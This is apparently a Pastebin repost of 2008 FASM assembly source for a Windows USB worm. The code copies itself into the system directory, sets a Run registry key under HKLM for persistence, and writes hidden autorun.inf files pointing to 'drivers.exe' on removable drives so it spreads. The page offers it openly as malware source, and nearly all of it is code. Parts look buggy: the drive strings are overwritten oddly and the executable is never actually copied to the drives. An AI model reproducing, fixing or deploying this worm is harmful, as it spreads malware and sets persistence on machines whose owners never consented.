API tools faq
paste
Advertisement
FlyFar

illuZ1oN's USB Worm - Source Code - Rohitab - Forums

FlyFar
Jul 4th, 2023
1,634
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 3.80 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ;  W32/USB<span class="searchlite">Worm</span> - illuz1oN 2008
  2. ; Spreads using usb's!
  3. ; Copyright illuz1oN 2008
  4. ; h4ck-y0u.org
  5. ; Compile with FASM!!
  6.  
  7. include "H:\Liam\FASM\INCLUDE\WIN32AX.inc"
  8.  
  9. .data
  10.     iMutex db 'USB <span class="searchlite">Worm</span>, illuz1oN', 0
  11.     regKey db '<span class="searchlite">Worm</span>zorz', 0
  12.     regPth db 'software\Microsoft\Windows\CurrentVersion\Run',0
  13.     newExe db 'drivers.exe', 0
  14.     msgTit db 'illuz1oN USB <span class="searchlite">Worm</span>!', 0
  15.     msgbox db 'This <span class="searchlite">worm</span> Has Spread to: ', 0
  16.     sysName db 'illuz.exe', 0
  17.     autoInf db 'autorun.inf', 0
  18.     autoRun db '[autorun]', 0
  19.     drv1 db 'A:\', 0
  20.     drv2 db 'U:\', 0
  21.     drv3 db 'H:\', 0
  22.     drv4 db 'G:\', 0
  23.     inf1 db 'A:\autorun.inf', 0
  24.     inf2 db 'U:\autorun.inf', 0
  25.     inf3 db 'H:\autorun.inf', 0
  26.     inf4 db 'G:\autorun.inf', 0
  27.     sysPath rb 256d
  28.     myPath rb 256d
  29.     reg dd ?
  30.  
  31. .code
  32. wootwoot:
  33.     mov byte [autoRun+10d], 13d
  34.     mov byte [autoRun+11d], 10d
  35.     mov dword [autoRun+12d], 'open'
  36.     mov dword [autoRun+16d], '=dri'
  37.     mov dword [autoRun+20d], 'vers'
  38.     mov dword [autoRun+24d], '.exe'
  39.     push 256d
  40.     push myPath
  41.     push 0
  42.     call [GetModuleFileName]
  43.     push 256d
  44.     push sysPath
  45.     call [GetSystemDirectory]
  46.     push sysPath
  47.     push sysName
  48.     call [lstrcat]
  49.     push 0
  50.     push sysPath
  51.     push myPath
  52.     call [CopyFile]
  53.     push reg
  54.     push KEY_ALL_ACCESS
  55.     push regPth
  56.     push HKEY_LOCAL_MACHINE
  57.     call [RegOpenKeyEx]
  58.     cmp eax,0
  59.     je exitwoot
  60.     push sysPath
  61.     call [lstrlen]
  62.     cmp eax,0
  63.     je exitwoot
  64.     push eax
  65.     push sysPath
  66.     push REG_SZ
  67.     push regKey
  68.     push reg
  69.     call [RegSetValueEx]
  70.     call checkdrive
  71.  
  72. checkdrive:
  73.     push drv1
  74.     call [GetDriveType]
  75.     cmp eax,DRIVE_REMOVABLE
  76.     je spread1
  77.     xor eax,eax
  78.     push drv2
  79.     call [GetDriveType]
  80.     cmp eax,DRIVE_REMOVABLE
  81.     je spread2
  82.     xor eax,eax
  83.     push drv3
  84.     call [GetDriveType]
  85.     cmp eax,DRIVE_REMOVABLE
  86.     je spread3
  87.     xor eax,eax
  88.     push drv4
  89.     call [GetDriveType]
  90.     cmp eax,DRIVE_REMOVABLE
  91.     je spread4
  92.     call exitwoot
  93.  
  94. spread1:
  95.     mov dword [drv1+3d], newExe
  96.     push 0
  97.     push FILE_ATTRIBUTE_HIDDEN
  98.     push CREATE_ALWAYS
  99.     push 0
  100.     push 0
  101.     push inf1
  102.     call [CreateFile]
  103.     mov ebx, eax
  104.     push autoRun
  105.     call [lstrlen]
  106.     push 0
  107.     push 0
  108.     push eax
  109.     push autoRun
  110.     push ebx
  111.     call [WriteFile]
  112.     push ebx
  113.     call [CloseHandle]
  114.     xor ebx,ebx
  115.     xor eax,eax
  116.  
  117. spread2:
  118.     mov dword [drv2+3d], newExe
  119.     push 0
  120.     push FILE_ATTRIBUTE_HIDDEN
  121.     push CREATE_ALWAYS
  122.     push 0
  123.     push 0
  124.     push inf2
  125.     call [CreateFile]
  126.     mov ebx, eax
  127.     push autoRun
  128.     call [lstrlen]
  129.     push 0
  130.     push 0
  131.     push eax
  132.     push autoRun
  133.     push ebx
  134.     call [WriteFile]
  135.     push ebx
  136.     call [CloseHandle]
  137.     xor ebx,ebx
  138.     xor eax,eax
  139.  
  140. spread3:
  141.     mov dword [drv3+3d], newExe
  142.     push 0
  143.     push FILE_ATTRIBUTE_HIDDEN
  144.     push CREATE_ALWAYS
  145.     push 0
  146.     push 0
  147.     push inf3
  148.     call [CreateFile]
  149.     mov ebx, eax
  150.     push autoRun
  151.     call [lstrlen]
  152.     push 0
  153.     push 0
  154.     push eax
  155.     push autoRun
  156.     push ebx
  157.     call [WriteFile]
  158.     push ebx
  159.     call [CloseHandle]
  160.     xor ebx,ebx
  161.     xor eax,eax
  162.  
  163. spread4:
  164.     mov dword [drv4+3d], newExe
  165.     push 0
  166.     push FILE_ATTRIBUTE_HIDDEN
  167.     push CREATE_ALWAYS
  168.     push 0
  169.     push 0
  170.     push inf4
  171.     call [CreateFile]
  172.     mov ebx, eax
  173.     push autoRun
  174.     call [lstrlen]
  175.     push 0
  176.     push 0
  177.     push eax
  178.     push autoRun
  179.     push ebx
  180.     call [WriteFile]
  181.     push ebx
  182.     call [CloseHandle]
  183.     xor ebx,ebx
  184.     xor eax,eax
  185.  
  186. exitwoot:
  187.     xor eax,eax
  188.     push 0
  189.     call [ExitProcess]
  190.  
  191. .end wootwoot
Tags: usb worm fasm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!